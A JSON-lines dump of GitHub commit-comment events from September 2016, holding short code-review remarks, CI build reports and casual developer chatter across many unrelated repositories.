{"id":"4525369388","type":"CommitCommentEvent","actor":{"login":"zhanglihang"},"repo":{"name":"zhanglihang/content"},"payload":{"comment":{"id":18922929,"position":5,"line":5,"path":"test.php","commit_id":"298e848d131dab8eceee48cd751b32b008668322","created_at":"2016-09-07T04:29:26Z","updated_at":"2016-09-07T04:29:26Z","body":"<title>无标题文档</title>"}},"created_at":"2016-09-07T04:29:26Z"}
{"id":"4525375128","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18922936,"position":null,"line":null,"path":null,"commit_id":"e9249abc83f4b2ba0182ac3150115eccb5873461","created_at":"2016-09-07T04:32:03Z","updated_at":"2016-09-07T04:32:03Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (rraustad) - Win64-Windows-7-VisualStudio-12: OK (2328 of 2334 tests passed, 0 test warnings)\n\n * 6 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 6 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.74%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T04:32:03Z"}
{"id":"4525376597","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18922939,"position":null,"line":null,"path":null,"commit_id":"2a7129f96a61164d25fe362c2f72715cf7d19aba","created_at":"2016-09-07T04:32:42Z","updated_at":"2016-09-07T04:32:42Z","body":"yes, I saw the comment only now.. wouldn't have submitted the test had I seen it."}},"created_at":"2016-09-07T04:32:42Z"}
{"id":"4525378369","type":"CommitCommentEvent","actor":{"login":"Vaelatern"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18922942,"position":null,"line":null,"path":null,"commit_id":"87420cffd81ce5377d94af446e92da6ecd73374d","created_at":"2016-09-07T04:33:28Z","updated_at":"2016-09-07T04:33:28Z","body":"#4227 #4572 "}},"created_at":"2016-09-07T04:33:28Z"}
{"id":"4525379500","type":"CommitCommentEvent","actor":{"login":"macedonia21"},"repo":{"name":"Urigo/meteor-angular-socially"},"payload":{"comment":{"id":18922943,"position":17,"line":17,"path":"imports/ui/components/partyCreator/partyCreator.js","commit_id":"e8c4338dbb8ba87d3e023a300092d8d39104cd99","created_at":"2016-09-07T04:33:56Z","updated_at":"2016-09-07T04:33:56Z","body":"Need to add this line\r\nthis.subscribe('users');"}},"created_at":"2016-09-07T04:33:56Z"}
{"id":"4525380165","type":"CommitCommentEvent","actor":{"login":"KnightHawk3"},"repo":{"name":"KnightHawk3/packr"},"payload":{"comment":{"id":18922946,"position":6,"line":0,"path":"packr/models.py","commit_id":"b4ed7ab9d6ceb771ec65512ffa3f36645b4ee606","created_at":"2016-09-07T04:34:12Z","updated_at":"2016-09-07T04:34:12Z","body":"Remove the parentheses "}},"created_at":"2016-09-07T04:34:12Z"}
{"id":"4525381789","type":"CommitCommentEvent","actor":{"login":"singlethreaded"},"repo":{"name":"Infocyte/PSHunt"},"payload":{"comment":{"id":18922951,"position":null,"line":null,"path":null,"commit_id":"97f103df28328203ef219693a787c962c157fd88","created_at":"2016-09-07T04:34:51Z","updated_at":"2016-09-07T04:34:51Z","body":"Also added OS discovery but for now it's not threaded... will fix that."}},"created_at":"2016-09-07T04:34:51Z"}
{"id":"4525383103","type":"CommitCommentEvent","actor":{"login":"koujinshidui"},"repo":{"name":"ruanyf/jstutorial"},"payload":{"comment":{"id":18922954,"position":null,"line":null,"path":null,"commit_id":"ab3ad4cecb67b0165a7ccd3313d6efb292052cd5","created_at":"2016-09-07T04:35:24Z","updated_at":"2016-09-07T04:35:24Z","body":"大牛 ，来膜拜下 。"}},"created_at":"2016-09-07T04:35:24Z"}
{"id":"4525385218","type":"CommitCommentEvent","actor":{"login":"KnightHawk3"},"repo":{"name":"KnightHawk3/packr"},"payload":{"comment":{"id":18922955,"position":53,"line":0,"path":"packr/models.py","commit_id":"b4ed7ab9d6ceb771ec65512ffa3f36645b4ee606","created_at":"2016-09-07T04:36:14Z","updated_at":"2016-09-07T04:36:14Z","body":"I think I have a created at mixin, if I don't add a created at time thay defaults to the current time, or add the created at mixin "}},"created_at":"2016-09-07T04:36:14Z"}
{"id":"4525386572","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18922959,"position":null,"line":null,"path":null,"commit_id":"68c38686e1160b145b6cb3aa029c4272fd91fed6","created_at":"2016-09-07T04:36:49Z","updated_at":"2016-09-07T04:36:49Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-68c38686e1160b145b6cb3aa029c4272fd91fed6-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-68c38686e1160b145b6cb3aa029c4272fd91fed6-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T04:36:49Z"}
{"id":"4525389671","type":"CommitCommentEvent","actor":{"login":"ducdhm"},"repo":{"name":"Kademi/kademi-dev"},"payload":{"comment":{"id":18922964,"position":null,"line":null,"path":null,"commit_id":"805fe00045330d05c192307daa4cc0384eada0c8","created_at":"2016-09-07T04:38:08Z","updated_at":"2016-09-07T04:38:08Z","body":"It's for #2324 "}},"created_at":"2016-09-07T04:38:08Z"}
{"id":"4525390398","type":"CommitCommentEvent","actor":{"login":"phraktle"},"repo":{"name":"lmdbjava/lmdbjava"},"payload":{"comment":{"id":18922966,"position":null,"line":null,"path":null,"commit_id":"1df380a2f27c946eceb64b83591dd87737f11eb4","created_at":"2016-09-07T04:38:24Z","updated_at":"2016-09-07T04:38:24Z","body":"Suggestion: the list of return-code constants should also be centralized. It's somewhat easier to see if everything is indeed matched from the native LMDB error list, plus it would defer class loading for all these exception classes until they are actually triggered."}},"created_at":"2016-09-07T04:38:24Z"}
{"id":"4525391858","type":"CommitCommentEvent","actor":{"login":"zenithtekla"},"repo":{"name":"zetekla/mean-made-simple"},"payload":{"comment":{"id":18922968,"position":51,"line":99,"path":"server.js","commit_id":"4136c23c711d883c8206637cce1e4ab0049680ee","created_at":"2016-09-07T04:39:01Z","updated_at":"2016-09-07T04:39:01Z","body":"Similarly, there is `findByIdAndUpdate`"}},"created_at":"2016-09-07T04:39:01Z"}
{"id":"4525391870","type":"CommitCommentEvent","actor":{"login":"jaff20"},"repo":{"name":"jsinghfoss/opencsv"},"payload":{"comment":{"id":18922969,"position":1,"line":1,"path":"src/main/resources/test.csv","commit_id":"c04d076ffdad04637a9a3d6aa3ff3d4a0b41d43a","created_at":"2016-09-07T04:39:02Z","updated_at":"2016-09-07T04:39:02Z","body":"when the column has (underscore) f_name, its return null"}},"created_at":"2016-09-07T04:39:02Z"}
{"id":"4525393750","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18922973,"position":null,"line":null,"path":null,"commit_id":"68c38686e1160b145b6cb3aa029c4272fd91fed6","created_at":"2016-09-07T04:39:48Z","updated_at":"2016-09-07T04:39:48Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-68c38686e1160b145b6cb3aa029c4272fd91fed6-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-68c38686e1160b145b6cb3aa029c4272fd91fed6-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T04:39:48Z"}
{"id":"4525399803","type":"CommitCommentEvent","actor":{"login":"duronto-soft"},"repo":{"name":"duronto-soft/sagarfiles"},"payload":{"comment":{"id":18922980,"position":null,"line":null,"path":null,"commit_id":"8cab303d334aae3aee4fd4e53ef10fb4b68ca7b4","created_at":"2016-09-07T04:42:17Z","updated_at":"2016-09-07T04:42:17Z","body":"good"}},"created_at":"2016-09-07T04:42:17Z"}
{"id":"4525400343","type":"CommitCommentEvent","actor":{"login":"rmzelle"},"repo":{"name":"citation-style-language/styles"},"payload":{"comment":{"id":18922983,"position":null,"line":null,"path":null,"commit_id":"d7fa26479d6600707922e3e1bfb0f92647d6050c","created_at":"2016-09-07T04:42:31Z","updated_at":"2016-09-07T04:42:31Z","body":"(No. Further discussed at https://github.com/Yusufras/styles/pull/2#issuecomment-244860131)"}},"created_at":"2016-09-07T04:42:31Z"}
{"id":"4525402246","type":"CommitCommentEvent","actor":{"login":"me4502"},"repo":{"name":"KnightHawk3/packr"},"payload":{"comment":{"id":18922984,"position":53,"line":0,"path":"packr/models.py","commit_id":"b4ed7ab9d6ceb771ec65512ffa3f36645b4ee606","created_at":"2016-09-07T04:43:18Z","updated_at":"2016-09-07T04:43:18Z","body":"You had, but you got rid of it."}},"created_at":"2016-09-07T04:43:18Z"}
{"id":"4525405505","type":"CommitCommentEvent","actor":{"login":"KnightHawk3"},"repo":{"name":"KnightHawk3/packr"},"payload":{"comment":{"id":18922988,"position":53,"line":0,"path":"packr/models.py","commit_id":"b4ed7ab9d6ceb771ec65512ffa3f36645b4ee606","created_at":"2016-09-07T04:44:42Z","updated_at":"2016-09-07T04:44:42Z","body":"You could add it in again or just implement it on this class "}},"created_at":"2016-09-07T04:44:42Z"}
{"id":"4525406709","type":"CommitCommentEvent","actor":{"login":"jarioksa"},"repo":{"name":"vegandevs/vegan"},"payload":{"comment":{"id":18922989,"position":null,"line":null,"path":null,"commit_id":"7d5c6e75f3c17a83d0d0d03840bc396cfb85e19a","created_at":"2016-09-07T04:45:12Z","updated_at":"2016-09-07T04:45:12Z","body":"@gavinsimpson , updating `tests/Examples` in a branch is guaranteed to get you into trouble: if `tests/Examples` were changed in the `master` (like now), there will be conflicts at least in `Time elapsed:` and usually also in **R** version string. The `tests/Examples` references material should be only updated in the `master` *after* the merge."}},"created_at":"2016-09-07T04:45:12Z"}
{"id":"4525410970","type":"CommitCommentEvent","actor":{"login":"cydh"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18922998,"position":null,"line":null,"path":null,"commit_id":"23b271c9582c5c5e1ab60b8a356facd69e90f905","created_at":"2016-09-07T04:47:04Z","updated_at":"2016-09-07T04:47:04Z","body":"find the message on msgstringtable.txt line (around) 1774"}},"created_at":"2016-09-07T04:47:04Z"}
{"id":"4525413026","type":"CommitCommentEvent","actor":{"login":"candycat1992"},"repo":{"name":"Stomachache007/PencilDrawing"},"payload":{"comment":{"id":18923006,"position":31,"line":31,"path":"GenPencil.m","commit_id":"040c1699f449ac1008eaa6a6d15650515d170d52","created_at":"2016-09-07T04:48:00Z","updated_at":"2016-09-07T04:48:00Z","body":"hi, you can read [this blog](http://blog.csdn.net/bluecol/article/details/45422763) for mathematical details. \r\n\r\nIn short, ∇β is the [Laplace operator](https://en.wikipedia.org/wiki/Laplace_operator#Two_dimensions) of β. In two dimensions (e.g. image space) it can be computed by the equation:\r\n\r\n![image](https://cloud.githubusercontent.com/assets/5907064/18300105/c5fc5dc6-74f8-11e6-935c-dc3a9605c240.png)\r\n\r\nThe right equation is the sum of squaring the x and y [gradients](https://en.wikipedia.org/wiki/Image_gradient), and in my code, they are computed by Dx and Dy.\r\n\r\n"}},"created_at":"2016-09-07T04:48:00Z"}
{"id":"4525414746","type":"CommitCommentEvent","actor":{"login":"slackero"},"repo":{"name":"slackero/phpwcms"},"payload":{"comment":{"id":18923010,"position":null,"line":null,"path":null,"commit_id":"a0eb6cf3d28628f7fd6da266538dcd9e31ca5475","created_at":"2016-09-07T04:48:46Z","updated_at":"2016-09-07T04:48:46Z","body":"See this [line >](https://github.com/slackero/phpwcms/commit/a0eb6cf3d28628f7fd6da266538dcd9e31ca5475#diff-2db03dac0dd7e2957365002e5641b815L382).\r\n\r\nIf there are no news the array is empty and it's not recommend to do the foreach (loop) because of PHP Warning: _Invalid argument supplied for foreach() in…_"}},"created_at":"2016-09-07T04:48:46Z"}
{"id":"4525415984","type":"CommitCommentEvent","actor":{"login":"Jithendra14"},"repo":{"name":"Jithendra14/Jitendra_201301028"},"payload":{"comment":{"id":18923012,"position":null,"line":null,"path":null,"commit_id":"ab17090091562d3e0022926e0d27bdf69701e892","created_at":"2016-09-07T04:49:18Z","updated_at":"2016-09-07T04:49:18Z","body":"[Assignment.txt](https://github.com/Jithendra14/Jitendra_201301028/files/458286/Assignment.txt)\r\n"}},"created_at":"2016-09-07T04:49:18Z"}
{"id":"4525416390","type":"CommitCommentEvent","actor":{"login":"sameersbn"},"repo":{"name":"sameersbn/docker-redmine"},"payload":{"comment":{"id":18923013,"position":24,"line":15,"path":"docker-compose.yml","commit_id":"c436a9c650950fb0cea6977339ff2decc780a858","created_at":"2016-09-07T04:49:29Z","updated_at":"2016-09-07T04:49:29Z","body":"links are more of a compose v1 thing. In v2, with the creation of networks, links are more or less useless."}},"created_at":"2016-09-07T04:49:29Z"}
{"id":"4525420340","type":"CommitCommentEvent","actor":{"login":"rayiyaoyao"},"repo":{"name":"leifos/tango_with_django_19"},"payload":{"comment":{"id":18923019,"position":232,"line":195,"path":"manuscript/chapter10-cookies.md","commit_id":"2f9e104af95cff56dfb5a12fc2aa04dd1a730625","created_at":"2016-09-07T04:51:12Z","updated_at":"2016-09-07T04:51:12Z","body":"Since  the  'test_cookie_wored' has been added to the _test_  view, \r\n\r\n> navigate to the registration page. When the registration\r\n\r\nshould be\r\n\r\n> navigate to the about page. When the about\r\n\r\nif we want see the \"TEST COOKIE WORKED\" in console\r\n"}},"created_at":"2016-09-07T04:51:12Z"}
{"id":"4525421836","type":"CommitCommentEvent","actor":{"login":"kvnol"},"repo":{"name":"kvnol/hyperterm-website"},"payload":{"comment":{"id":18923022,"position":null,"line":null,"path":null,"commit_id":"56170977490024bf89c3bbe42f281cc61e80a16e","created_at":"2016-09-07T04:51:52Z","updated_at":"2016-09-07T04:51:52Z","body":"# Modifications\r\n\r\n- Added file style.css (follow the model — code-guide — with best pratices of use HTML/CSS by @mdo)\r\n- Remove tag <style> of index.html"}},"created_at":"2016-09-07T04:51:52Z"}
{"id":"4525428145","type":"CommitCommentEvent","actor":{"login":"Drmadhu"},"repo":{"name":"theOtherKc/ProgrammingAssignment2"},"payload":{"comment":{"id":18923033,"position":null,"line":null,"path":null,"commit_id":"a54ae2297a64c098514e61a83ed0bf3f40614016","created_at":"2016-09-07T04:54:38Z","updated_at":"2016-09-07T04:54:38Z","body":"In CatcheSolve function $is invalid with functions(line no:29,34,36)"}},"created_at":"2016-09-07T04:54:38Z"}
{"id":"4525432119","type":"CommitCommentEvent","actor":{"login":"yhu98"},"repo":{"name":"iOS-Connect/sc-ios-connect"},"payload":{"comment":{"id":18923042,"position":null,"line":null,"path":null,"commit_id":"81765a9bea43f96de3ffb0b747f65b0ddd4e8372","created_at":"2016-09-07T04:56:19Z","updated_at":"2016-09-07T04:56:19Z","body":"@regnerjr please review the meetup description for this coming Sunday on Walmart API before sending them out to the group, thank you! 💃 "}},"created_at":"2016-09-07T04:56:19Z"}
{"id":"4525437134","type":"CommitCommentEvent","actor":{"login":"gavinsimpson"},"repo":{"name":"vegandevs/vegan"},"payload":{"comment":{"id":18923049,"position":null,"line":null,"path":null,"commit_id":"7d5c6e75f3c17a83d0d0d03840bc396cfb85e19a","created_at":"2016-09-07T04:58:35Z","updated_at":"2016-09-07T04:58:35Z","body":"@jarioksa Yeah, I saw that and fixed it locally but then a colleague pooped by for a chat and I forgot to finish the merge and push to master. Will complete that now."}},"created_at":"2016-09-07T04:58:35Z"}
{"id":"4525437616","type":"CommitCommentEvent","actor":{"login":"jtara1"},"repo":{"name":"jtara1/MediaToVideo"},"payload":{"comment":{"id":18923050,"position":null,"line":null,"path":null,"commit_id":"613e95852b001e51558eacb803f73e950229afc8","created_at":"2016-09-07T04:58:47Z","updated_at":"2016-09-07T04:58:47Z","body":"globl.glob(/home/mypath/*) returns some odd characters (namely when returning path of a file with the name of 'home/mypath/img/image.jpg' where img/image.jpg is the actual file name."}},"created_at":"2016-09-07T04:58:47Z"}
{"id":"4525439650","type":"CommitCommentEvent","actor":{"login":"jpartain89"},"repo":{"name":"jpartain89/Software-Install-Guides"},"payload":{"comment":{"id":18923056,"position":null,"line":null,"path":null,"commit_id":"4206203a5918e8f6270d0b79a0b5d993717c6d63","created_at":"2016-09-07T04:59:38Z","updated_at":"2016-09-07T04:59:38Z","body":"Updating commit message:\r\n\r\ncreated #blank files so all directories get pushed for sphinx-autodoc.\r\n\r\nRemoved the .komodoproject file, as that was simply testing that software - which did not pan out. "}},"created_at":"2016-09-07T04:59:38Z"}
{"id":"4525441119","type":"CommitCommentEvent","actor":{"login":"Rikk"},"repo":{"name":"piroor/multipletab"},"payload":{"comment":{"id":18923057,"position":null,"line":null,"path":null,"commit_id":"089f676a18434d0b954ffcf5a4c01a9383f9dc4d","created_at":"2016-09-07T05:00:13Z","updated_at":"2016-09-07T05:00:13Z","body":"Thanks for the fix, works for me too. However, I see small flicker in the animation when tabs are passing between others, not sure it was there before."}},"created_at":"2016-09-07T05:00:13Z"}
{"id":"4525445765","type":"CommitCommentEvent","actor":{"login":"jfly"},"repo":{"name":"cubing/ccm"},"payload":{"comment":{"id":18923067,"position":null,"line":null,"path":null,"commit_id":"d6582e1c59ef3261d87552d6a10fcb24c7451672","created_at":"2016-09-07T05:01:59Z","updated_at":"2016-09-07T05:01:59Z","body":"Would it make be cleaner to have a different layout container for pages specific to a competition?"}},"created_at":"2016-09-07T05:01:59Z"}
{"id":"4525447697","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18923073,"position":null,"line":null,"path":null,"commit_id":"f78f51e2a7cbbbfc464e4761b0d70505dd4edb92","created_at":"2016-09-07T05:02:43Z","updated_at":"2016-09-07T05:02:43Z","body":"BSD seq can use negative increments, but the end number has to be less than the start number in that case."}},"created_at":"2016-09-07T05:02:43Z"}
{"id":"4525449051","type":"CommitCommentEvent","actor":{"login":"evangipson"},"repo":{"name":"evangipson/chessy"},"payload":{"comment":{"id":18923074,"position":null,"line":null,"path":null,"commit_id":"b04b96aa548ae7627e9f2954339fecf928f010c6","created_at":"2016-09-07T05:03:20Z","updated_at":"2016-09-07T05:03:20Z","body":"This was for issue #1."}},"created_at":"2016-09-07T05:03:20Z"}
{"id":"4525449582","type":"CommitCommentEvent","actor":{"login":"joshuadeleon"},"repo":{"name":"joshuadeleon/7languages7weeks"},"payload":{"comment":{"id":18923075,"position":null,"line":null,"path":null,"commit_id":"2d86d0b9c32c0e2d7c24803996749acea2167f30","created_at":"2016-09-07T05:03:36Z","updated_at":"2016-09-07T05:03:36Z","body":"Thanks for the heads up. I had been trying to limit myself as much as possible to what was presented in the book. I have found Prolog to be the biggest challenge I've had with a language since starting with C. It's quite an interesting paradigm. I probably should pick up a proper Prolog book ^_^"}},"created_at":"2016-09-07T05:03:36Z"}
{"id":"4525451721","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18923080,"position":null,"line":null,"path":null,"commit_id":"af3f58809d014a9a5990fc631d2ae2997c6d95a8","created_at":"2016-09-07T05:04:27Z","updated_at":"2016-09-07T05:04:27Z","body":"Hum.. this location works for me. Network hiccup?"}},"created_at":"2016-09-07T05:04:27Z"}
{"id":"4525452889","type":"CommitCommentEvent","actor":{"login":"omarmonta"},"repo":{"name":"omarmonta/Repositorio.uno"},"payload":{"comment":{"id":18923083,"position":2,"line":2,"path":".gitattributes","commit_id":"ec00b9fef3a90421801b87151e3a1d284b14d6fb","created_at":"2016-09-07T05:04:59Z","updated_at":"2016-09-07T05:04:59Z","body":"Omar Montaño  Torres\r\nDiseño de sitios WEB"}},"created_at":"2016-09-07T05:04:59Z"}
{"id":"4525453235","type":"CommitCommentEvent","actor":{"login":"regnerjr"},"repo":{"name":"iOS-Connect/sc-ios-connect"},"payload":{"comment":{"id":18923084,"position":null,"line":null,"path":null,"commit_id":"81765a9bea43f96de3ffb0b747f65b0ddd4e8372","created_at":"2016-09-07T05:05:08Z","updated_at":"2016-09-07T05:05:08Z","body":"You are awesome thanks for getting the ball rolling on this. ð ð¢ "}},"created_at":"2016-09-07T05:05:08Z"}
{"id":"4525455608","type":"CommitCommentEvent","actor":{"login":"yhu98"},"repo":{"name":"iOS-Connect/sc-ios-connect"},"payload":{"comment":{"id":18923086,"position":null,"line":null,"path":null,"commit_id":"81765a9bea43f96de3ffb0b747f65b0ddd4e8372","created_at":"2016-09-07T05:06:08Z","updated_at":"2016-09-07T05:06:08Z","body":"Glad I can help! :D "}},"created_at":"2016-09-07T05:06:08Z"}
{"id":"4525456728","type":"CommitCommentEvent","actor":{"login":"David256"},"repo":{"name":"David256/ChatBotTelegram"},"payload":{"comment":{"id":18923091,"position":null,"line":null,"path":null,"commit_id":"5591d8c469d999e2c775c4108c55543a7ccb5f87","created_at":"2016-09-07T05:06:32Z","updated_at":"2016-09-07T05:06:32Z","body":"Ahora que miro, está de más el `[1]`. Entonces, quedaría:\r\n`print('El bot conoce {0} palabras, pero eso no es todo, también conoce {1}'.format(ia.settings.num_words, ia.settings.num_contexts))`"}},"created_at":"2016-09-07T05:06:32Z"}
{"id":"4525460993","type":"CommitCommentEvent","actor":{"login":"tgiphil"},"repo":{"name":"pleonex/NitroDebugger"},"payload":{"comment":{"id":18923095,"position":null,"line":null,"path":null,"commit_id":"9231d38dc86dcea7cfd36cae02cde0f6759632d2","created_at":"2016-09-07T05:08:22Z","updated_at":"2016-09-07T05:08:22Z","body":"Thanks!\r\n"}},"created_at":"2016-09-07T05:08:22Z"}
{"id":"4525466209","type":"CommitCommentEvent","actor":{"login":"zhengbli"},"repo":{"name":"sumitkm/DefinitelyTyped"},"payload":{"comment":{"id":18923105,"position":64,"line":65,"path":"quill/quill.d.ts","commit_id":"d13b79b85168ffcfccf2923b076a03e02705601f","created_at":"2016-09-07T05:10:29Z","updated_at":"2016-09-07T05:10:29Z","body":"Sorry to update again, you can actually make a type alias for `\"api\" | \"user\" | \"silent\"`, then use it here, so you won't worry about typos.\r\n```\r\ntype SourceType = \"api\" | \"user\" | \"silent\";\r\n... source?: SourceType\r\n```"}},"created_at":"2016-09-07T05:10:29Z"}
{"id":"4525467045","type":"CommitCommentEvent","actor":{"login":"mdgouse2000"},"repo":{"name":"mdgouse2000/fuzzy-robot"},"payload":{"comment":{"id":18923108,"position":null,"line":null,"path":null,"commit_id":"6f3a8de277081a9ecbafb2bc65b77758acbc98a3","created_at":"2016-09-07T05:10:51Z","updated_at":"2016-09-07T05:10:51Z","body":"adfsfdafasfasfsf"}},"created_at":"2016-09-07T05:10:51Z"}
{"id":"4525470671","type":"CommitCommentEvent","actor":{"login":"regnerjr"},"repo":{"name":"iOS-Connect/sc-ios-connect"},"payload":{"comment":{"id":18923123,"position":null,"line":null,"path":null,"commit_id":"c687655254c7c5dd32d8e39e48c75a354a726ba6","created_at":"2016-09-07T05:12:22Z","updated_at":"2016-09-07T05:12:22Z","body":"@yhu98 Let me know what you think about this change. "}},"created_at":"2016-09-07T05:12:22Z"}
{"id":"4525470671","type":"CommitCommentEvent","actor":{"login":"regnerjr"},"repo":{"name":"iOS-Connect/sc-ios-connect"},"payload":{"comment":{"id":18923123,"position":null,"line":null,"path":null,"commit_id":"c687655254c7c5dd32d8e39e48c75a354a726ba6","created_at":"2016-09-07T05:12:22Z","updated_at":"2016-09-07T05:12:22Z","body":"@yhu98 Let me know what you think about this change. "}},"created_at":"2016-09-07T05:12:22Z"}
{"id":"4525471570","type":"CommitCommentEvent","actor":{"login":"yurrriq"},"repo":{"name":"elli-lib/elli_date"},"payload":{"comment":{"id":18923125,"position":null,"line":null,"path":null,"commit_id":"33d8623d15eed0f97c99f6c5f98dd020780cf45f","created_at":"2016-09-07T05:12:44Z","updated_at":"2016-09-07T05:12:44Z","body":"@knutin, we should get in touch about [elli-lib](https://github.com/elli-lib) in general. I'll shoot you an email soon. Please let me know if there's a better way to connect. I'm @yurrriq on IRC, Twitter, etc."}},"created_at":"2016-09-07T05:12:44Z"}
{"id":"4525471694","type":"CommitCommentEvent","actor":{"login":"zhengbli"},"repo":{"name":"sumitkm/DefinitelyTyped"},"payload":{"comment":{"id":18923126,"position":64,"line":65,"path":"quill/quill.d.ts","commit_id":"d13b79b85168ffcfccf2923b076a03e02705601f","created_at":"2016-09-07T05:12:47Z","updated_at":"2016-09-07T05:12:47Z","body":"And another alias for { [key: string]: any }, because these two types seem to be used a lot in many places."}},"created_at":"2016-09-07T05:12:47Z"}
{"id":"4525474678","type":"CommitCommentEvent","actor":{"login":"bobwenx"},"repo":{"name":"jnr/jnr-posix"},"payload":{"comment":{"id":18923131,"position":null,"line":null,"path":null,"commit_id":"f3e408dd88a8ea00ff3d84c6d6bfdf304baca601","created_at":"2016-09-07T05:14:02Z","updated_at":"2016-09-07T05:14:02Z","body":"When is this patch released?"}},"created_at":"2016-09-07T05:14:02Z"}
{"id":"4525476684","type":"CommitCommentEvent","actor":{"login":"mx3L"},"repo":{"name":"mx3L/serviceapp"},"payload":{"comment":{"id":18923137,"position":null,"line":null,"path":null,"commit_id":"28c10b1f909031152c3e75c31a6c60f27294783e","created_at":"2016-09-07T05:14:52Z","updated_at":"2016-09-07T05:14:52Z","body":">And maybe it is better not to add another variable but change contentStarted to int and use it.\r\n\r\nAgree, but perhaps name contentSize would be more appropriate"}},"created_at":"2016-09-07T05:14:52Z"}
{"id":"4525477677","type":"CommitCommentEvent","actor":{"login":"WasabiFan"},"repo":{"name":"ev3dev/ev3dev.github.io"},"payload":{"comment":{"id":18923141,"position":13,"line":36,"path":"_includes/motor.md","commit_id":"92a17b471f017675b48f767dd05ea6406e86752c","created_at":"2016-09-07T05:15:16Z","updated_at":"2016-09-07T05:15:16Z","body":"Just curious: what's the footnote removal for? Is it not currently in use?"}},"created_at":"2016-09-07T05:15:16Z"}
{"id":"4525478197","type":"CommitCommentEvent","actor":{"login":"LattePanda"},"repo":{"name":"LattePandaTeam/LattePanda-Win10-Software"},"payload":{"comment":{"id":18923142,"position":null,"line":null,"path":null,"commit_id":"91073a4d8680d52dbeedacaca7b936ff9a91fba8","created_at":"2016-09-07T05:15:28Z","updated_at":"2016-09-07T05:15:28Z","body":"Hi,\n\n\nSorry for the inconvenient, we can't upload the driver package in a zip, because its too big...\n\n\nThe link maybe helpful: Download ZIP<https://github.com/LattePandaTeam/LattePanda-Win10-Software/archive/master.zip>\n\n\nLook forward to your reply\n\n\nBest Regards,\nKelvin Sun\n________________________________\nFrom: Nightwolf <notifications@github.com>\nSent: Wednesday, September 7, 2016 12:20:48 AM\nTo: LattePandaTeam/LattePanda-Win10-Software\nSubject: Re: [LattePandaTeam/LattePanda-Win10-Software] update drivers (91073a4)\n\n\nHow can I download the Driver package? Or only the Display driver pack?\nThere is no ZIP button, there is no download or RAW or share or whatsoever button.\n\nThe official Driver Link that I found is from before the last changes made here.\n\n-\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub<https://github.com/LattePandaTeam/LattePanda-Win10-Software/commit/91073a4d8680d52dbeedacaca7b936ff9a91fba8#commitcomment-18913988>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AQGbk1TPFFl6i9cJO7qX5TasZ8_fYtyyks5qnZLggaJpZM4J2Bdv>.\n"}},"created_at":"2016-09-07T05:15:28Z"}
{"id":"4525478880","type":"CommitCommentEvent","actor":{"login":"zxz054321"},"repo":{"name":"aviouy/count"},"payload":{"comment":{"id":18923146,"position":1,"line":16,"path":"app/Http/routes.php","commit_id":"3e28dfce9adec3e8275b28d3c0e8ad435574f795","created_at":"2016-09-07T05:15:48Z","updated_at":"2016-09-07T05:15:48Z","body":"闭包去掉"}},"created_at":"2016-09-07T05:15:48Z"}
{"id":"4525487983","type":"CommitCommentEvent","actor":{"login":"daveypir"},"repo":{"name":"daveypir/Hello-World"},"payload":{"comment":{"id":18923168,"position":null,"line":null,"path":null,"commit_id":"38b01e9e7d441014547bbdd482f6a1b4d104175f","created_at":"2016-09-07T05:19:43Z","updated_at":"2016-09-07T05:19:43Z","body":"Is this the readme file"}},"created_at":"2016-09-07T05:19:43Z"}
